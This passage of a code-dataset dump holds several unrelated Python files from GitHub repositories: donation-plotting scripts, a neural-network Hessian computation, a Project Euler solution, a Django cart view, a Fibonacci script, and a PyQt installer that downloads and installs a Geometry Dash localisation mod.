fnd_donation_dict(candidate, filename):\n donations = []\n date = []\n neg = []\n\n donations, date, neg = getData(candidate, donations, date, neg, filename)\n\n date = sorted(date)\n plt.plot(date, donations, color = 'y')\n plt.xlabel('Date of Donation')\n plt.ylabel('Amount Donated')\n plt.title('Campaign Contributions by Date')\n\n#PART 3\n#creates a graph of donations for multiple candidates\ndef multiple_donations(candidate1, candidate2, filename):\n c1donations = []\n c2donations = []\n c1dates = []\n c2dates = []\n neg = []\n\n c1donations, c1dates, neg = getData(candidate1, c1donations, c1dates, neg, filename)\n\n filename.close()\n filename = open('newfile.txt', 'r')\n\n c2donations, c2dates, neg = getData(candidate2, c2donations, c2dates, neg, filename)\n\n c1dates = sorted(c1dates)\n c2dates = sorted(c2dates)\n\n plt.plot(c1dates,c1donations,color = 'b')\n plt.plot(c2dates,c2donations, color = 'r')\n plt.xlabel('Date of Donation')\n plt.ylabel('Amount Donated')\n plt.title('Multiple Candidates Campaign Contributions by Date')\n blue_patch = mpatches.Patch(color='blue', label=candidate1)\n red_patch = mpatches.Patch(color='red', label=candidate2)\n plt.legend(handles=[red_patch, blue_patch])\n\n#PART 4\n#creates a graph of donations for multiple candidates that cuts off at a specified date\ndef cumulative_graph(candidate1, candidate2, date, filename):\n c1donations = []\n c2donations = []\n c1dates = []\n c2dates = []\n neg = []\n\n c1donations, c1dates, neg = getData(candidate1, c1donations, c1dates, neg, filename)\n\n filename.close()\n filename = open('newfile.txt', 'r')\n\n c2donations, c2dates, neg = getData(candidate2, c2donations, c2dates, neg, filename)\n\n c1dates = sorted(c1dates)\n c2dates = sorted(c2dates)\n\n date = datetime.strptime(date, \"%d-%b-%y\")\n\n c1donations, c1dates = 
delete_from_list(c1donations, c1dates, date)\n c2donations, c2dates = delete_from_list(c2donations, c2dates, date)\n\n plt.plot(c1dates, c1donations, color='b')\n plt.plot(c2dates, c2donations, color='r')\n plt.xlabel('Date of Donation')\n plt.ylabel('Amount Donated')\n plt.title('Increased Support for Bernie')\n blue_patch = mpatches.Patch(color='blue', label=candidate1)\n red_patch = mpatches.Patch(color='red', label=candidate2)\n plt.legend(handles=[red_patch, blue_patch])\n\n#helper method that creates new arrays without anything past the given date\ndef delete_from_list(donations, dates, enddate):\n i = 0\n newDates = []\n newDonations = []\n for day in dates:\n if day <= enddate:\n newDonations.append(donations[i])\n newDates.append(day)\n i+=1\n\n return newDonations, newDates\n\n\n#PART 5\n#graphs the amount of donations for each reason for a negative donation\ndef negative_donations(candidate, filename):\n donations = []\n date = []\n neg = []\n\n donations, date, neg = getData(candidate, donations, date, neg, filename)\n\n redesignationG = 0\n refund = 0\n reattribution = 0\n redesignationPG = 0\n\n redesignationG, refund, reattribution, redesignationPG = negative_reasons(neg, redesignationG, refund, reattribution, redesignationPG)\n\n groups = 4\n index = np.arange(groups)\n bar_width = 0.35\n\n y_axis = (redesignationG, refund, reattribution, redesignationPG)\n\n plt.bar(index, y_axis, bar_width, color = 'b')\n plt.xlabel('Reason for Negative Donation')\n plt.ylabel('Amount of Negative Donations')\n plt.xticks(index+bar_width, ('REDESIGNATION TO GENERAL', 'Refund', 'REATTRIBUTION TO SPOUSE', 'REDESIGNATION TO PRESIDENTIAL GENERAL'))\n plt.title('Negative Donations and Reasons for Ted Cruz')\n\n#graphs only the refunds\n#it is possible that these refunds were made because of insufficient funds\ndef refunds(candidate, filename):\n donations = []\n date = []\n neg = []\n\n donations, date, neg = getData(candidate, donations, date, neg, filename)\n\n redesignationG = 0\n refund = 0\n reattribution = 0\n redesignationPG = 0\n\n amountofnegs = len(neg)\n\n redesignation, refund, reattribution, redesignationPG = negative_reasons(neg, redesignationG, refund, reattribution, redesignationPG)\n\n groups = 1\n index = np.arange(groups)\n bar_width = 1\n\n plt.bar(index, refund, bar_width, color = 'b')\n plt.xlabel('Reason for Negative Donation')\n plt.ylabel('Amount of Negative Donations')\n plt.title('Refunds for Ted Cruz')\n\n#helper method to get the amount of donations for each negative reason\ndef negative_reasons(negativearray, redesignationG, refund, reattribution, redesignationPG):\n for reason in negativearray:\n if reason == 'REDESIGNATION TO GENERAL':\n redesignationG+=1\n if reason == 'Refund':\n refund+=1\n if reason == 'REATTRIBUTION TO SPOUSE':\n reattribution+=1\n if reason == 'REDESIGNATION TO PRESIDENTIAL GENERAL':\n redesignationPG+=1\n\n return redesignationG, refund, reattribution, redesignationPG\n\n\n\n#helper method to extract data from the spreadsheet\ndef getData(candidate, donations, date, neg, filename):\n i = 0\n for line in filename:\n if i>0:\n data = StringIO(line)\n reader = csv.reader(data, delimiter=',')\n\n for row in reader:\n candidateName = row[2]\n if candidateName == candidate:\n donations.append(row[9])\n betterDate = datetime.strptime(row[10], \"%d-%b-%y\")\n date.append(betterDate)\n if row[9].startswith('-'):\n neg.append(row[11])\n\n i+=1\n\n return donations, date, neg\n\nfilename = open('P00000001-ALL.csv', 'r')\n#filename = 
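# Hedged aside on take_sample.py above: getData() fills `donations` and `date`
# in parallel, but the callers then sort only the date list, so plotted
# (date, amount) pairs can end up misaligned. A minimal sketch that keeps the
# pairs together while sorting (sample values are made up):
from datetime import datetime

def sort_pairs(dates, donations):
    pairs = sorted(zip(dates, donations), key=lambda p: p[0])
    if not pairs:
        return [], []
    sorted_dates, sorted_donations = zip(*pairs)
    return list(sorted_dates), list(sorted_donations)

d = [datetime(2015, 6, 1), datetime(2015, 5, 1)]
a = ['100', '250']
print(sort_pairs(d, a))  # amounts stay attached to their dates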
open('newFile.txt', 'r')\ncandidate1 = 'Sanders, Bernard'\ncandidate2 = 'Clinton, Hillary Rodham'\ncandidate3 = \"Cruz, Rafael Edward 'Ted'\"\ncandidate4 = \"Rubio, Marco\"\ncandidate5 = 'Bush, Jeb'\n#fnd_donation_dict(candidate1, filename)\n#multiple_donations(candidate1, candidate2, filename)\n#cumulative_graph(candidate1, candidate2, '13-JUN-15', filename)\n#negative_donations(candidate4, filename)\nrefunds(candidate3, filename)\nplt.show()\n","repo_name":"lcsteinberg1129/pythonProjects","sub_path":"take_sample.py","file_name":"take_sample.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32769564960","text":"import numpy as np\n\nx = np.array([[0.1,0.3,0.1,0.6,0.4,0.6,0.5,0.9,0.4,0.7],\n [0.1,0.4,0.5,0.9,0.2,0.3,0.6,0.2,0.4,0.6]])\n\ny = np.array([[1,1,1,1,1,0,0,0,0,0],\n [0,0,0,0,0,1,1,1,1,1]])\n\n\n#network is 2-2-3-2\nW0 = 0.5*np.random.rand(2,2)\nW1 = 0.5*np.random.rand(3,2)\nW2 = 0.5*np.random.rand(2,3)\n\ndef activate(x,W):\n \"\"\"Sigmoid activation function\"\"\"\n z = W@x\n a = 1/(1+np.exp(-z))\n return(a)\n\n\n# X\nx0 = x[:,0]\nx1 = activate(x0,W0)\nx2 = activate(x1,W1)\nx3 = activate(x2,W2)\n\n# Sigma'\nd1sigma1 = np.diagflat(x1*(1-x1))\nd1sigma2 = np.diagflat(x2*(1-x2))\nd1sigma3 = np.diagflat(x3*(1-x3))\n\n# Sigma''\nd2sigma1 = np.diagflat(x1*(1-x1)*(1-2*x1))\nd2sigma2 = np.diagflat(x2*(1-x2)*(1-2*x2))\nd2sigma3 = np.diagflat(x3*(1-x3)*(1-2*x3))\n\n# Lambdas\nl3 = x3-y[:,0]\nl2 = W2.T @d1sigma3 @l3\nl1 = W1.T @d1sigma2 @l2\nl0 = W0.T @d1sigma1 @l1\n\n\n# V\nv0 = np.ones(4)\nv1 = np.ones(6)\nv2 = np.ones(6)\n\n# Xi\nxi0 = np.zeros(2)\nxi1 = d1sigma1 @ W0 @ xi0 + np.kron(x0.T,d1sigma1) @ v0\nxi2 = d1sigma2 @ W1 @ xi1 + np.kron(x1.T,d1sigma2) @ v1\nxi3 = d1sigma3 @ W2 @ xi2 + np.kron(x2.T,d1sigma3) @ v2\n\n# A\nA0 = W0.T @ np.diagflat(l1) @ d2sigma1 @ W0\nA1 = W1.T @ np.diagflat(l2) @ d2sigma2 @ W1\nA2 = W2.T @ np.diagflat(l3) @ d2sigma3 @ W2\n\n# D\nD0 = np.kron(np.outer(x0,x0), np.diagflat(l1) @ d2sigma1)\nD1 = np.kron(np.outer(x1,x1), np.diagflat(l2) @ d2sigma2)\nD2 = np.kron(np.outer(x2,x2), np.diagflat(l3) @ d2sigma3)\n","repo_name":"wbbreslin/NeuralNetwork","sub_path":"Old Code/Hessian Implementation.py","file_name":"Hessian Implementation.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31383736284","text":"\"\"\"\r\n## Names scores\r\n\r\nProblem 22\r\n\r\nUsing names.txt (right click and 'Save Link/Target As...'), a 46K text file containing over five-thousand first names, begin by sorting it into alphabetical order. Then working out the alphabetical value for each name, multiply this value by its alphabetical position in the list to obtain a name score.\r\n\r\nFor example, when the list is sorted into alphabetical order, COLIN, which is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. 
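# Hedged numeric check of the factors built in "Hessian Implementation.py"
# above: x*(1-x) and x*(1-x)*(1-2x) are the first and second derivatives of
# the logistic sigmoid at a = sigmoid(z). Step size and tolerances below are
# assumptions for the finite-difference comparison, not from the repo.
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

z = np.linspace(-3, 3, 7)
a = sigmoid(z)
h = 1e-5
d1 = (sigmoid(z + h) - sigmoid(z - h)) / (2 * h)        # central difference
d2 = (sigmoid(z + h) - 2 * a + sigmoid(z - h)) / h**2
assert np.allclose(d1, a * (1 - a), atol=1e-8)
assert np.allclose(d2, a * (1 - a) * (1 - 2 * a), atol=1e-4)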
So, COLIN would obtain a score of 938 × 53 = 49714.\r\n\r\nWhat is the total of all the name scores in the file?\r\n\r\n\r\nLink: https://projecteuler.net/problem=22\r\n\r\nDate solved: \r\n2022/04/01\r\n\"\"\"\r\n\r\nANSWER = 871198282\r\n\r\n# imports\r\n\r\n\r\n# solution\r\n\r\n\r\ndef solution():\r\n file_name = \"problem_files/p022_names.txt\"\r\n with open(file_name, \"r\") as f:\r\n names = f.read()\r\n names = names[1:-1].split('\",\"')\r\n names.sort()\r\n\r\n def name_score(name):\r\n score = 0\r\n for char in name:\r\n score += ord(char) - 64\r\n return score\r\n\r\n name_score_sum = 0\r\n for i, name in enumerate(names):\r\n name_score_sum += name_score(name) * (i + 1)\r\n\r\n return name_score_sum\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from time import perf_counter\r\n\r\n t0 = perf_counter()\r\n sol = solution()\r\n t1 = perf_counter()\r\n print(f\"solution = {sol} in {t1-t0: 0.4f} seconds\")\r\n print(\"answer =\", ANSWER)\r\n","repo_name":"lsabor/project_euler","sub_path":"000-100/20s/022_05_Name_scores.py","file_name":"022_05_Name_scores.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44261853042","text":"from django.shortcuts import render,redirect, reverse\n\n# Create your views here.\n\ndef view_cart(request):\n \"\"\"\n A view that renders the cart content\n \"\"\"\n return render (request, \"cart.html\")\n\n \"\"\"\n Note that we dont have to pass a cart dictionary (as we had to do with products)\n because the context is available everywhere\n \"\"\"\n\ndef add_to_cart(request, id):\n \"\"\"\n Add a quantity of the specified product to the cart\n \"\"\"\n quantity = int(request.POST.get('quantity'))\n\n cart = request.session.get('cart', {})\n if id in cart:\n cart[id] = int(cart[id]) + quantity \n else:\n cart[id] = cart.get(id, quantity) \n\n request.session['cart'] = cart\n return redirect(reverse('index'))\n\ndef adjust_cart(request, id):\n \"\"\"\n Adjust the quantity of the specified product to the specified\n amount\n \"\"\"\n quantity = int(request.POST.get('quantity'))\n cart = request.session.get('cart', {})\n\n if quantity > 0:\n cart[id] = quantity\n else:\n cart.pop(id)\n \n request.session['cart'] = cart\n return redirect(reverse('view_cart'))","repo_name":"elenasacristan/ecommercce","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18398764652","text":"print(\"fibonacci number? 
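# Hedged mini-check of the scoring rule in 022_05_Name_scores.py above:
# ord(char) - 64 maps 'A'..'Z' to 1..26, so COLIN = 3+15+12+9+14 = 53 and at
# alphabetical position 938 it scores 938 * 53 = 49714, matching the docstring.
def name_score(name):
    return sum(ord(c) - 64 for c in name)

assert name_score('COLIN') == 53
assert 938 * name_score('COLIN') == 49714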
\")\nnum = int(input())\n\ndef fibo(n):\n\tif(n == 0):\n\t\treturn 1;\n\telif(n == 1):\n\t\treturn 1;\n\telse:\n\t\treturn fibo(n-2) + fibo(n-1)\n\nresult = []\n\nfor i in range(num):\n\tresult.append(fibo(i))\n\nprint(\"F\", num, \" = \", result)\n\n\n","repo_name":"WBQT/git_test","sub_path":"fibo_num.py","file_name":"fibo_num.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7893104154","text":"import os\nimport sys\nimport shutil\nimport subprocess\nimport json\nimport zlib\nimport winreg\nimport requests\nimport time\nimport finder\nimport threader\nimport winapi\nfrom PyQt5 import QtCore, QtWidgets\nfrom installer_ui import Ui_MainWindow\n\n\nclass Installer:\n def __init__(self, app: any, installer_data: dict = None) -> None:\n self.app = app\n self.installer_data = installer_data or {}\n self.logger = self.app.logger\n self.application = QtWidgets.QApplication(sys.argv)\n self.window = QtWidgets.QMainWindow()\n self.hwnd = int(self.window.winId())\n self.app.check_dark_theme()\n self.logger.log('Dark Theme', self.app.is_dark)\n if self.app.is_dark:\n self.app.apply_dark(self.hwnd)\n self.set_stylesheet('Darkeum')\n else:\n self.set_stylesheet('Ubuntu')\n self.install_game_path = ''\n self.install_path = ''\n self.locale_str = self.installer_data.get('locale')\n self.locale_split = [self.locale_str] if self.locale_str else QtCore.QLocale().name().lower().strip().split('_')\n self.logger.log('System Locale', self.locale_split)\n self.binary_data = b''\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self.window)\n self.after_setup_ui()\n if 'ru' in self.locale_split:\n self.ui.langBox.setCurrentIndex(1)\n else:\n self.ui.langBox.setCurrentIndex(0)\n self.locale_str = 'en'\n self.load_locale('en')\n self.window.show()\n self.json_data = {}\n self.exit_code = self.application.exec_()\n\n def check_lang(self, current_index: int) -> None:\n if current_index == 0:\n self.locale_str = 'en'\n elif current_index == 1:\n self.locale_str = 'ru'\n self.load_locale(self.locale_str or 'en')\n\n def load_locale(self, locale_str: str) -> None:\n self.app.locale = json.loads(self.app.read_text(os.path.join(self.app.files_dir, f'locale_{locale_str}.json')))\n _translate = QtCore.QCoreApplication.translate\n ld = self.app.locale['data']\n self.window.setWindowTitle(ld[0])\n self.ui.hellomainLabel.setText(ld[1])\n self.ui.helloLabel1.setText(ld[2])\n self.ui.helloLabel2.setText(ld[3])\n self.ui.langLabel.setText(ld[4])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.helloTab), ld[5])\n self.ui.folderLabel.setText(ld[6])\n self.ui.folderpathButton.setText(ld[7])\n self.ui.regappBox.setText(ld[8])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.folderselectTab), ld[9])\n self.ui.defaultType.setText(ld[10])\n self.ui.loaderType.setText(ld[11])\n self.ui.modType.setText(ld[12])\n self.ui.hackType.setText(ld[13])\n self.ui.typeLabel.setText(ld[14])\n self.ui.gdhmType.setText(ld[15])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.typeselectTab), ld[16])\n self.ui.downloadLabel.setText(ld[17])\n self.ui.unpackLabel.setText(ld[18])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.installTab), ld[19])\n self.ui.ok1Label.setText(ld[20])\n self.ui.ok2Label.setText(ld[21])\n self.ui.githubBox.setText(ld[22])\n self.ui.discordBox.setText(ld[23])\n self.ui.siteBox.setText(ld[24])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.okTab), ld[25])\n self.ui.cancelButton.setText(ld[26])\n 
self.ui.goForwardButton.setText(ld[27])\n self.ui.goBackButton.setText(ld[28])\n\n def after_setup_ui(self) -> None:\n self.window.setWindowFlag(QtCore.Qt.WindowType.CustomizeWindowHint, True)\n self.window.setWindowFlags(\n # QtCore.Qt.WindowType.WindowCloseButtonHint |\n QtCore.Qt.WindowType.WindowMinimizeButtonHint\n )\n self.ui.tabs.setCurrentIndex(0)\n self.ui.tabs.tabBar().setEnabled(not self.app.is_compiled)\n if self.installer_data:\n self.ui.folderpathEdit.setText(self.installer_data['game_path'])\n self.ui.regappBox.setChecked(self.installer_data['is_registered'])\n self.ui.folderpathEdit.setEnabled(False)\n self.ui.folderpathButton.setEnabled(False)\n self.ui.regappBox.setEnabled(False)\n else:\n self.ui.folderpathEdit.setText(\n finder.ProcessFinder(self.app).game_dir or finder.SteamFinder(self.app).game_dir\n )\n if not self.app.is_compiled:\n self.ui.folderpathEdit.setText('e:/games/gd_test')\n self.bind_events()\n\n def bind_events(self) -> None:\n self.ui.cancelButton.clicked.connect(lambda: self.app.show_question(\n self.window, self.app.locale['data'][29], self.app.locale['data'][30], self.window.close\n ))\n self.ui.goForwardButton.clicked.connect(self.go_forward)\n self.ui.goBackButton.clicked.connect(self.go_back)\n self.ui.folderpathButton.clicked.connect(self.select_install_dir)\n self.ui.folderpathEdit.textChanged.connect(self.check_install_dir)\n self.ui.adafpathEdit.textChanged.connect(self.check_radio_buttons)\n self.ui.loaderType.changeEvent = self.check_radio_buttons\n self.ui.langBox.currentIndexChanged.connect(self.check_lang)\n self.logger.log('Events bound')\n\n def run_game_installer_and_exit(self) -> None:\n subprocess.Popen(os.path.join(self.ui.folderpathEdit.text(), 'GDL_Installer.exe'))\n sys.exit(0)\n\n def tab_changed(self, to_change: int = -1) -> None:\n if to_change >= 0:\n self.ui.tabs.setCurrentIndex(to_change)\n tab_id = to_change\n else:\n tab_id = self.ui.tabs.currentIndex()\n self.logger.log('Tab id', tab_id)\n if tab_id == 0:\n self.ui.goBackButton.setEnabled(False)\n self.ui.goForwardButton.setEnabled(True)\n elif tab_id == 1:\n self.load_json()\n self.ui.goBackButton.setEnabled(True)\n self.ui.goForwardButton.setText(self.app.locale['data'][27])\n self.check_install_dir()\n elif tab_id == 2:\n if not self.installer_data:\n check_fn = os.path.join(self.ui.folderpathEdit.text(), 'gdl-installer.json')\n if os.path.isfile(check_fn):\n self.tab_changed(1)\n self.app.show_question(\n self.window,\n self.app.locale['data'][31],\n self.app.locale['data'][32],\n self.run_game_installer_and_exit\n )\n self.ui.goBackButton.setEnabled(True)\n self.ui.goForwardButton.setText(self.app.locale['data'][33])\n default_path = os.path.join(self.ui.folderpathEdit.text(), 'adaf-dll')\n self.ui.defaultType.setEnabled(not (os.path.isdir(default_path) and os.listdir(default_path)))\n self.ui.modType.setEnabled(os.path.isdir(os.path.join(self.ui.folderpathEdit.text(), 'mods')))\n self.ui.hackType.setEnabled(os.path.isdir(os.path.join(self.ui.folderpathEdit.text(), 'extensions')))\n self.ui.gdhmType.setEnabled(os.path.isdir(os.path.join(self.ui.folderpathEdit.text(), '.GDHM', 'dll')))\n self.check_radio_buttons()\n if not self.installer_data:\n return\n self.ui.defaultType.setEnabled(False)\n self.ui.modType.setEnabled(False)\n self.ui.hackType.setEnabled(False)\n self.ui.gdhmType.setEnabled(False)\n self.ui.loaderType.setEnabled(False)\n self.ui.adafpathEdit.setEnabled(False)\n elif tab_id == 3:\n self.ui.goForwardButton.setEnabled(False)\n 
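# Hedged sketch of the directory probing in installer.py above: each install
# target is offered only when its folder already exists under the game path.
# Recreated with a temp directory so the snippet runs anywhere.
import os, tempfile

game_dir = tempfile.mkdtemp()
os.makedirs(os.path.join(game_dir, 'mods'))
targets = {
    'mod': os.path.isdir(os.path.join(game_dir, 'mods')),
    'hack': os.path.isdir(os.path.join(game_dir, 'extensions')),
    'gdhm': os.path.isdir(os.path.join(game_dir, '.GDHM', 'dll')),
}
assert targets == {'mod': True, 'hack': False, 'gdhm': False}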
self.ui.goBackButton.setEnabled(False)\n self.ui.cancelButton.setEnabled(False)\n target_dir = 'adaf-dll'\n if self.ui.modType.isChecked():\n target_dir = 'mods'\n elif self.ui.hackType.isChecked():\n target_dir = 'extensions'\n elif self.ui.gdhmType.isChecked():\n target_dir = os.path.join('.GDHM', 'dll')\n self.install_game_path = self.ui.folderpathEdit.text()\n self.install_path = os.path.join(self.install_game_path, target_dir)\n if self.installer_data:\n self.install_path = self.installer_data['dll_path']\n if not os.path.isdir(self.install_path):\n os.mkdir(self.install_path)\n self.ui.downloadBar.setMaximum(self.json_data['size'])\n self.ui.unpackBar.setMaximum(self.json_data['gdl-assets-size'])\n self.logger.log('Installing to', self.install_path)\n self.window.download_thread = loader = threader.Downloader()\n self.window.binary_data = b''\n loader.url = self.json_data['binaries-url']\n loader.encoding = self.app.encoding\n loader.chunk_size = 1024 * 32 if self.app.is_compiled else 1024 * 128\n loader.progress.connect(self.download_progress)\n loader.start()\n elif tab_id == 4:\n self.ui.goForwardButton.setEnabled(True)\n self.ui.goBackButton.setEnabled(False)\n self.ui.cancelButton.setEnabled(False)\n self.ui.goForwardButton.setText(self.app.locale['data'][34])\n\n def register_app(self) -> None:\n self.logger.log('Registering app')\n reg = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE)\n try:\n winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, self.app.reg_path)\n except Exception as err:\n self.logger.error('Failed to create reg key', err)\n return\n try:\n key = winreg.OpenKey(reg, self.app.reg_path, 0, winreg.KEY_WRITE)\n except Exception as err:\n self.logger.error('Failed to open reg key', err)\n return\n winreg.SetValueEx(key, 'DisplayIcon', 0, winreg.REG_SZ, os.path.join(self.install_game_path, 'gdl-icon.ico'))\n winreg.SetValueEx(key, 'DisplayName', 0, winreg.REG_SZ, 'Geometry Dash Localisation')\n winreg.SetValueEx(key, 'DisplayVersion', 0, winreg.REG_SZ, '1.0.0')\n winreg.SetValueEx(key, 'URLInfoAbout', 0, winreg.REG_SZ, self.json_data['settings-url'])\n installer_path = '\"' + os.path.join(self.install_game_path, os.path.basename(self.app.exec_script)) + '\"'\n if not self.app.is_compiled:\n installer_path = '\"' + sys.executable + '\" ' + installer_path\n self.logger.log('Installer path', installer_path)\n winreg.SetValueEx(\n key,\n 'ModifyPath',\n 0,\n winreg.REG_SZ,\n installer_path.replace('/', '\\\\') + ' --modify'\n )\n winreg.SetValueEx(\n key,\n 'UninstallString',\n 0,\n winreg.REG_SZ,\n installer_path.replace('/', '\\\\') + ' --remove'\n )\n winreg.SetValueEx(key, 'Publisher', 0, winreg.REG_SZ, 'The GDL Community')\n winreg.SetValueEx(key, 'NoModify', 0, winreg.REG_DWORD, 0)\n winreg.SetValueEx(key, 'NoRepair', 0, winreg.REG_DWORD, 0)\n winreg.CloseKey(key)\n\n def save_settings(self) -> None:\n try:\n shutil.copy(\n self.app.exec_script,\n os.path.join(self.install_game_path, os.path.basename(self.app.exec_script))\n )\n except Exception as err:\n self.logger.error('Failed to copy installer', err)\n shutil.copy(\n os.path.join(self.app.files_dir, 'gdl_icon.ico'),\n os.path.join(self.install_game_path, 'gdl-icon.ico')\n )\n if self.installer_data:\n is_default = self.installer_data['is_default']\n is_registered = self.installer_data['is_registered']\n else:\n is_default = self.ui.defaultType.isChecked()\n is_registered = self.ui.regappBox.isChecked()\n json_result = {\n 'locale': self.locale_str,\n 'is_default': is_default,\n 'is_registered': 
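# Hedged standalone check of the UninstallString built in register_app()
# above: the executable path is quoted, forward slashes flipped to
# backslashes, and a flag appended. Paths here are illustrative only.
install_game_path = 'C:/Games/GeometryDash'
exec_name = 'installer.py'
installer_path = '"' + install_game_path + '/' + exec_name + '"'
uninstall_string = installer_path.replace('/', '\\') + ' --remove'
assert uninstall_string == '"C:\\Games\\GeometryDash\\installer.py" --remove'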
is_registered,\n 'dll_path': self.install_path,\n 'game_path': self.install_game_path,\n 'json_data': self.json_data\n }\n self.app.write_text(os.path.join(self.install_game_path, 'gdl-installer.json'), json.dumps(json_result))\n self.logger.log('Installer json wrote')\n if self.ui.regappBox.isChecked():\n self.register_app()\n self.tab_changed(4)\n\n def unzip_gdl(self) -> None:\n self.logger.log('Unzipping gdl into memory')\n files = {}\n for data in self.json_data['gdl-binaries']:\n files[data['fn']] = self.binary_data[:data['size']]\n self.binary_data = self.binary_data[data['size']:]\n self.logger.log('Other size 0 is', len(self.binary_data))\n for fn in ('gdl_patches.json', 'ru_ru.json', 'ru_ru_locations.json', 'minhook.x32.dll'):\n self.app.write_binary(os.path.join(self.install_game_path, fn), files[fn])\n if not self.installer_data and self.ui.defaultType.isChecked(): # Please work\n try:\n self.app.write_binary(os.path.join(self.install_game_path, 'xinput9_1_0.dll'), files['xinput9_1_0.dll'])\n except Exception as err:\n self.logger.error('Failed to write xinput', err)\n dll_path = os.path.join(self.install_path, 'GDLocalisation.dll')\n dll_bak_path = dll_path + '.bak'\n if os.path.isfile(dll_bak_path):\n try:\n os.remove(dll_bak_path)\n except Exception as err:\n self.logger.error('Failed to remove dll backup', err)\n if os.path.isfile(dll_path):\n os.rename(dll_path, dll_bak_path)\n self.app.write_binary(\n dll_path,\n files['GDLocalisation.dll']\n )\n self.logger.log('Binaries are unzipped')\n self.save_settings()\n\n def unzip_progress(self, status: int, content: str) -> None:\n if status == 0:\n self.ui.unpackBar.setValue(len(self.binary_data) - int(content))\n return\n if status == 1:\n self.binary_data = self.binary_data[self.json_data['gdl-assets-size']:]\n self.logger.log('Data Unzipped')\n self.unzip_gdl()\n return\n self.logger.error('Failed to unzip assets', content)\n self.app.show_error(\n self.window,\n self.app.locale['data'][31],\n self.app.locale['data'][35],\n lambda: self.tab_changed(2)\n )\n\n def download_progress(self, status: int, chunk: bytes) -> None:\n if status == 0:\n self.window.binary_data += chunk # noqa\n self.ui.downloadBar.setValue(len(self.window.binary_data)) # noqa\n return\n if status == 1:\n self.binary_data = zlib.decompress(self.window.binary_data, 0xF | 0x20) # noqa\n del self.window.binary_data # noqa\n self.logger.log('Bin downloaded', len(self.binary_data)) # noqa\n backup_path = os.path.join(self.install_game_path, 'gdl-backup')\n if not os.path.isdir(backup_path):\n os.mkdir(backup_path)\n self.logger.log('Backup dir created')\n self.logger.log('Unzipping to', self.install_game_path)\n self.window.unzip_thread = unzipper = threader.Unzipper()\n unzipper.encoding = self.app.encoding\n unzipper.base_dir = self.install_game_path\n unzipper.json_data = self.json_data['gdl-assets']\n unzipper.bin_data = self.binary_data\n unzipper.progress.connect(self.unzip_progress)\n unzipper.start()\n return\n del self.window.binary_data # noqa\n self.logger.error('Failed to download bin', chunk.decode(self.app.encoding))\n self.app.show_error(\n self.window,\n self.app.locale['data'][31],\n self.app.locale['data'][36],\n lambda: self.tab_changed(2)\n )\n\n def go_forward(self) -> None:\n self.logger.log('Go forward')\n if self.ui.tabs.currentIndex() == 2:\n if self.ui.loaderType.isChecked():\n if not os.path.isdir(os.path.join(self.ui.folderpathEdit.text(), self.ui.adafpathEdit.text())):\n self.app.show_error(\n self.window,\n 
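# Hedged round-trip for the decompression call in download_progress() above:
# zlib.decompress(data, 0xF | 0x20) passes wbits = 47, which auto-detects a
# zlib or gzip header. Demonstrated with a gzip-wrapped dummy payload:
import gzip, zlib

payload = b'GDL binaries blob (illustrative bytes only)'
assert zlib.decompress(gzip.compress(payload), 0xF | 0x20) == payload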
self.app.locale['data'][31],\n self.app.locale['data'][37] + self.ui.adafpathEdit.text()\n )\n return\n if self.ui.tabs.currentIndex() == 4:\n if self.ui.siteBox.isChecked():\n winapi.ShellExecuteW(\n self.hwnd,\n None,\n self.json_data['site-url'],\n None,\n None,\n 0x05\n )\n if self.ui.githubBox.isChecked():\n winapi.ShellExecuteW(\n self.hwnd,\n None,\n self.json_data['github-url'],\n None,\n None,\n 0x05\n )\n if self.ui.discordBox.isChecked():\n winapi.ShellExecuteW(\n self.hwnd,\n None,\n self.json_data['settings-url'],\n None,\n None,\n 0x05\n )\n self.window.close()\n return\n self.ui.tabs.setCurrentIndex(self.ui.tabs.currentIndex() + 1)\n self.tab_changed()\n\n def go_back(self) -> None:\n self.logger.log('Go back')\n self.ui.tabs.setCurrentIndex(self.ui.tabs.currentIndex() - 1)\n self.tab_changed()\n\n def check_radio_buttons(self, *args: any) -> None:\n self.logger.log('Checking radio buttons', *args)\n self.ui.goForwardButton.setEnabled(True)\n if not self.ui.defaultType.isEnabled() and self.ui.defaultType.isChecked():\n self.ui.defaultType.setChecked(False)\n self.ui.loaderType.setChecked(True)\n\n def check_install_dir(self) -> None:\n install_dir = self.ui.folderpathEdit.text().strip()\n self.logger.log('Checking install dir', install_dir)\n if not os.path.isdir(install_dir):\n self.logger.log('Install dir check failed')\n return self.ui.goForwardButton.setEnabled(False)\n is_gd = self.app.is_gd_path(install_dir)\n self.logger.log('Install dir check', is_gd)\n self.ui.goForwardButton.setEnabled(is_gd)\n\n def select_install_dir(self) -> None:\n path = QtWidgets.QFileDialog.getExistingDirectory(\n self.window, self.app.locale['data'][38], self.ui.folderpathEdit.text()\n )\n self.logger.log('Selected install dir', path)\n self.ui.folderpathEdit.setText(path)\n self.check_install_dir()\n\n def load_json(self) -> None:\n self.logger.log('Downloading JSON')\n url = self.app.locale['json_url']\n start_time = time.time()\n try:\n resp = requests.get(url)\n if not resp.status_code == 200:\n raise RuntimeError('Failed to download code 200 != ' + str(resp.status_code))\n except Exception as err:\n self.logger.error('Failed to download JSON', err)\n return self.app.show_error(\n self.window,\n 